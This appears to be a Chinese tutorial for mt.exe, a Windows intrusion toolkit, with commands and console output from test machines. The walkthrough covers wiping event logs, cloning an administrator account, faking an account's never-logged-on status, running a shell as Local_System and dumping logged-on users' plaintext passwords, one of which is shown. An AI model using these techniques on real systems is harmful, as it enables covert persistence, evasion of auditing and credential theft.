用法: mt.exe <选项>
选项 :
-filter ---更改 TCP/IP 过滤器的开头状态
-addport ---添加端口到过滤器的允许列表
-setport ---设置端口作为过滤器的允许列表
-nicinfo ---列出 TCP/IP 界面信息
-pslist ---列出活动进程
-pskill ---杀毒指定进程
-dlllist ---列出指定进程的 DLL
-sysinfo ---列出系统信息
-shutdown ---关闭系统
-reboot ---重启系统
-poweroff ---关闭电源
-logoff ---注销当前用户会话
-chkts ---检查终端服务信息
-setupts ---安装终端服务
-remts ---卸载终端服务
-chgtsp ---重置终端服务端口
-clog ---清除系统日志
-enumsrv ---列出所有服务
-querysrv ---列出指定服务的详细信息
-instsrv ---安装一个服务
-cfgsrv ---更改服务配置
-remsrv ---卸载指定服务
-startsrv ---启动指定服务
-stopsrv ---停止指定服务
-netget ---从 http/ftp 下载
-redirect ---端口重定向
-chkuser ---列出所有账户、sid 和 anti 克隆
-clone ---克隆 admin 到目标
-never ---设置账户看上去从未登录
-killuser ---删除账户,甚至是 "guest" 也可删除
-su ---以 Local_System 权限运行进程
-findpass ---显示所有已登录用户的口令
-netstat ---列出 TCP 连接
-killtcp ---杀死 TCP 连接
-psport ---映射端口到进程
-touch ---设置文件日期和时间到指定值
-secdel ---安全擦除文件或目录占用的空间
-regshell ---进入一个控制台注册表编辑器
-chkdll ---检测 gina dll 后门
一MT.EXE –filter
Usage:
MT -filter ----Enabld|Disable TCP/IP Filter.
这个是打开关闭TCP/IP筛选的
二MT.EXE-pslist
列出系统活动进程
三MT.EXE -pskill
Usage:
mt -pskill 杀进程
我们使用MyIE.exe这个软件作为测试,看看他们能不能杀死这个进程,输入MT –PSLIST,我们知道MyIE.exe的PID值是924,于是输入:mt.exe -pskill 924
四mt.exe -dlllist
Usage:
mt -dlllist
列出进程中相关的DLL文件
五 mt.exe –sysinfo
列出系统信息
六mt.exe -shutdown ---Shutdown system.
-reboot ---Reboot system.
-poweroff ---Turn off power.
-logoff ---Logoff current user’s session.
这4个命令就不说了,和系统工具shutdown不一样的是,输入之后没有任何的提示,直接关机
七 mt.exe -chkts ---Check Terminal Service info.
-setupts ---Install Terminal Service. 安装终端服务
-remts ---Remove Terminal Service. 卸载终端服务
-chgtsp ---Reset Terminal Service port. 重新设置终端端口号
这4个命令是和Terminal相关的
八mt.exe -clog用来清除记录,我们输入:
Usage:
mt -clog ---Clean Application|Security|System|All logs.
从上面的可以看出,我们可以清除 "应用程序" "安全性" "系统"3个日志
九mt.exe-enumsrv
列出所有的服务
十mt.exe -clone
Usage:
mt -clone
克隆账号
新建一个用户yun,现在我要将管理员账号lin克隆为账号yun,输入:
D:/hack>mt -clone lin yun
Fail to Open SAM Key, 操作成功完成。
mt.exe -clone lin yun
Fail to Open SAM Key, 操作成功完成。
可能是不支持XP系统,虽然提示说操作成功,可是事实上,使用yun登陆的时候,还是没有成功,可能也是有其缺陷或者是我自己操作失败吧.
十一D:/>mt -never
-never ---Set account looks like never logged on.
它可以设置使用户看起来从来没有登陆过,在我的系统里面有2个用户,一个是管理员lin,另外一个是公用的帐户316,现在我把316设置为从不登陆的状态.输入
D:/>mt -never 316
Require System Privilege.提示没有权限,于是
D:/>mt -su
打开新的CMD窗口,输入
Microsoft Windows XP [版本 5.1.2600]
(C) 版权所有 1985-2001 Microsoft Corp.
C:/WINDOWS/system32>d:
D:/>mt -never 316
Fail to Set F Value.
D:/>net user 316
用户名 316
全名 316
注释
用户的注释
国家(地区)代码 000 (系统默认值)
帐户启用 Yes
帐户到期 从不
上次设置密码 2004/5/19 下午 08:22
密码到期 从不
密码可更改 2004/5/19 下午 08:22
需要密码 Yes
用户可以更改密码 Yes
允许的工作站 All
登录脚本
用户配置文件
主目录
上次登录 从不
可允许的登录小时数 All
本地组成员 *Users
全局组成员 *None
命令成功完成。
D:/>
可以看出来已经修改成功了,虽然显示的是Fail to Set F Value.,但还是成功了.这个功能和never.exe是一样的,只是将特定的的帐户上回登陆时间改为帐户从来没有登陆上过系统.
成功条件:你要有local system权限
十二 -su ---Run process as Local_System privilege.
以系统特权运行进程,在管理员登陆的情况下输入MT –su,马上弹出另外一CMD窗口,在这个窗口中,可以做任何我们想做的事情,这个也是系统的最高权限了.
20 -regshell ---Enter a console registry editor.
以CMD的方式编辑注册表,输入在CMD下不是很方便,不过有时候也是很使用的,输入:
D:/>mt -regshell
HKLM/>dir
HARDWARE
SAM
SECURITY
SOFTWARE
SYSTEM
Total: 5 SubKey, 0 Value.
HKLM/>quitreg
D:/>
和真实环境没有什么区别.
十三 mt.exe -psport ---Map ports to processes.
显示进程的端口
十四 mt.exe -findpass ---Show all logged on user’s pass.
得到所有登陆用户的密码,由于这个命令是For NT/2K only.,所以我在客户机上面测试这个功能,输入,很容易就得到了密码:
G:/WINNT/system32>mt -findpass
mt -findpass
The logon information :
Domain : 316-2AS8L1B1FL5
Username : Administrator
Password : winyaj
G:/WINNT/system32>
这个比findpass.exe还方便一些,不需要知道用户进程的PID值.